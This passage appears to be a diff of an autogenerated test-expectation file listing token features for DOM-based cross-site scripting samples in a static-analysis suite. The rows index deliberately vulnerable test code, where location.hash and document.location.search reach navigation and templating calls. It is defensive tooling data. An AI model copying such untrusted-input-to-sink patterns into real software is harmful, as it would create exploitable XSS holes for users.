element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:491:23:491:35 | location.hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:491:23:491:35 | location.hash | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:491:23:491:35 | location.hash | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:491:23:491:35 | location.hash | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:491:23:491:42 | location.hash.substr | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:491:23:491:42 | location.hash.substr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:491:23:491:42 | location.hash.substr | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:491:23:491:42 | location.hash.substr | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:491:23:491:42 | location.hash.substr | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:491:23:491:45 | exceptional return of locatio ... bstr(1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:491:23:491:45 | exceptional return of locatio ... bstr(1) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:491:23:491:45 | exceptional return of locatio ... bstr(1) | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:491:23:491:45 | exceptional return of locatio ... bstr(1) | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:491:23:491:45 | exceptional return of locatio ... bstr(1) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:491:23:491:45 | locatio ... bstr(1) | CalleeFlexibleAccessPath | navigation.navigate | | autogenerated/Xss/DomBasedXss/tst.js:491:23:491:45 | locatio ... bstr(1) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:491:23:491:45 | locatio ... bstr(1) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -18077,6 +124458,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:491:23:491:45 | locatio ... bstr(1) | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:491:23:491:45 | locatio ... bstr(1) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:491:23:491:45 | locatio ... bstr(1) | receiverName | navigation | +| autogenerated/Xss/DomBasedXss/tst.js:491:32:491:35 | hash | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:491:32:491:35 | hash | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:491:32:491:35 | hash | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:491:32:491:35 | hash | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:491:32:491:35 | hash | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:491:37:491:42 | substr | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:491:37:491:42 | substr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:491:37:491:42 | substr | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | +| autogenerated/Xss/DomBasedXss/tst.js:491:37:491:42 | substr | enclosingFunctionName | urlStuff | +| autogenerated/Xss/DomBasedXss/tst.js:491:37:491:42 | substr | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:491:44:491:44 | 1 | CalleeFlexibleAccessPath | location.hash.substr | | autogenerated/Xss/DomBasedXss/tst.js:491:44:491:44 | 1 | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:491:44:491:44 | 1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -18084,6 +124475,65 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:491:44:491:44 | 1 | enclosingFunctionBody | url document location search substr 1 $ href url appendTo body $ #foo attr href url $ #foo attr href url $ src url appendTo body $ href win location href appendTo body $ src http://google.com/ url appendTo body $ src http://google.com url join / appendTo body url startsWith https:// $ src url appendTo body $ src url appendTo body window open location hash substr 1 navigation navigate location hash substr 1 | | autogenerated/Xss/DomBasedXss/tst.js:491:44:491:44 | 1 | enclosingFunctionName | urlStuff | | autogenerated/Xss/DomBasedXss/tst.js:491:44:491:44 | 1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:1:1:0 | this | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:1:30:2 | (functi ... )\\t\\n}) | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:1:30:2 | (functi ... )\\t\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:1:30:2 | (functi ... )\\t\\n}) | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:2:1:1 | this | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:2:1:1 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:2:1:1 | this | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:2:1:1 | this | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:2:1:1 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:2:30:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:2:30:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:2:30:1 | 'arguments' object of anonymous function | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:2:30:1 | 'arguments' object of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:2:30:1 | 'arguments' object of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:2:30:1 | exceptional return of anonymous function | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:2:30:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:2:30:1 | exceptional return of anonymous function | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:2:30:1 | exceptional return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:2:30:1 | exceptional return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:2:30:1 | functio ... \\n )\\t\\n} | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:2:30:1 | functio ... \\n )\\t\\n} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:2:30:1 | functio ... \\n )\\t\\n} | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:2:30:1 | return of anonymous function | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:2:30:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:2:30:1 | return of anonymous function | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:2:30:1 | return of anonymous function | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:1:2:30:1 | return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:7:2:19 | autocompleter | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:7:2:19 | autocompleter | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:7:2:19 | autocompleter | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:7:2:19 | autocompleter | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:7:2:19 | autocompleter | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:7:4:4 | autocom ... rl\\n }) | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:7:4:4 | autocom ... rl\\n }) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:7:4:4 | autocom ... rl\\n }) | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:7:4:4 | autocom ... rl\\n }) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:7:4:4 | autocom ... rl\\n }) | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:7:4:4 | autocompleter | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:7:4:4 | autocompleter | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:7:4:4 | autocompleter | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:7:4:4 | autocompleter | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:7:4:4 | autocompleter | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:23:4:4 | exceptional return of new Blo ... rl\\n }) | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:23:4:4 | exceptional return of new Blo ... rl\\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:23:4:4 | exceptional return of new Blo ... rl\\n }) | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:23:4:4 | exceptional return of new Blo ... rl\\n }) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:23:4:4 | exceptional return of new Blo ... rl\\n }) | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:23:4:4 | new Blo ... rl\\n }) | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:23:4:4 | new Blo ... rl\\n }) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:23:4:4 | new Blo ... rl\\n }) | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:23:4:4 | new Blo ... rl\\n }) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:23:4:4 | new Blo ... rl\\n }) | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:27:2:36 | Bloodhound | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:27:2:36 | Bloodhound | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:27:2:36 | Bloodhound | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:27:2:36 | Bloodhound | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:2:27:2:36 | Bloodhound | fileImports | | | autogenerated/Xss/DomBasedXss/typeahead.js:2:38:4:3 | {\\n p ... Url\\n } | CalleeFlexibleAccessPath | Bloodhound | | autogenerated/Xss/DomBasedXss/typeahead.js:2:38:4:3 | {\\n p ... Url\\n } | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/typeahead.js:2:38:4:3 | {\\n p ... Url\\n } | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | @@ -18091,6 +124541,85 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/typeahead.js:2:38:4:3 | {\\n p ... Url\\n } | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | | autogenerated/Xss/DomBasedXss/typeahead.js:2:38:4:3 | {\\n p ... Url\\n } | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/typeahead.js:2:38:4:3 | {\\n p ... Url\\n } | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:3:5:3:12 | prefetch | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:3:5:3:12 | prefetch | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:3:5:3:12 | prefetch | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:3:5:3:12 | prefetch | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:3:5:3:12 | prefetch | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:3:5:3:23 | prefetch: remoteUrl | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:3:5:3:23 | prefetch: remoteUrl | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:3:5:3:23 | prefetch: remoteUrl | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:3:5:3:23 | prefetch: remoteUrl | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:3:5:3:23 | prefetch: remoteUrl | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:3:5:3:23 | prefetch: remoteUrl | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:3:5:3:23 | prefetch: remoteUrl | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:3:5:3:23 | prefetch: remoteUrl | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:3:5:3:23 | prefetch: remoteUrl | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:3:5:3:23 | prefetch: remoteUrl | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:3:15:3:23 | remoteUrl | CalleeFlexibleAccessPath | Bloodhound | +| autogenerated/Xss/DomBasedXss/typeahead.js:3:15:3:23 | remoteUrl | InputAccessPathFromCallee | ?.prefetch | +| autogenerated/Xss/DomBasedXss/typeahead.js:3:15:3:23 | remoteUrl | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/typeahead.js:3:15:3:23 | remoteUrl | assignedToPropName | prefetch | +| autogenerated/Xss/DomBasedXss/typeahead.js:3:15:3:23 | remoteUrl | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:3:15:3:23 | remoteUrl | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:3:15:3:23 | remoteUrl | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:3:15:3:23 | remoteUrl | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:3:15:3:23 | remoteUrl | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:3:5:15 | autocompleter | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:3:5:15 | autocompleter | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:3:5:15 | autocompleter | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:3:5:15 | autocompleter | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:3:5:15 | autocompleter | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:3:5:26 | autocom ... tialize | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:3:5:26 | autocom ... tialize | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:3:5:26 | autocom ... tialize | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:3:5:26 | autocom ... tialize | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:3:5:26 | autocom ... tialize | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:3:5:28 | autocom ... alize() | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:3:5:28 | autocom ... alize() | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:3:5:28 | autocom ... alize() | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:3:5:28 | autocom ... alize() | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:3:5:28 | autocom ... alize() | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:3:5:28 | exceptional return of autocom ... alize() | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:3:5:28 | exceptional return of autocom ... alize() | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:3:5:28 | exceptional return of autocom ... alize() | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:3:5:28 | exceptional return of autocom ... alize() | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:3:5:28 | exceptional return of autocom ... alize() | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:17:5:26 | initialize | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:17:5:26 | initialize | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:17:5:26 | initialize | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:17:5:26 | initialize | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:5:17:5:26 | initialize | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:6:3 | $ | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:6:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:6:3 | $ | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val val | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:6:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:6:3 | $ | fileImports | | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:6:17 | $('.typeahead') | contextFunctionInterfaces | source(query, cb)\nsuggestion(loc)\nsuggestion(val) | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:6:17 | $('.typeahead') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/typeahead.js:6:3:6:17 | $('.typeahead') | enclosingFunctionBody | autocompleter Bloodhound prefetch remoteUrl autocompleter initialize $ .typeahead typeahead source autocompleter ttAdapter templates suggestion loc loc $ .typeahead typeahead name dashboards source query cb target document location search cb target templates suggestion val 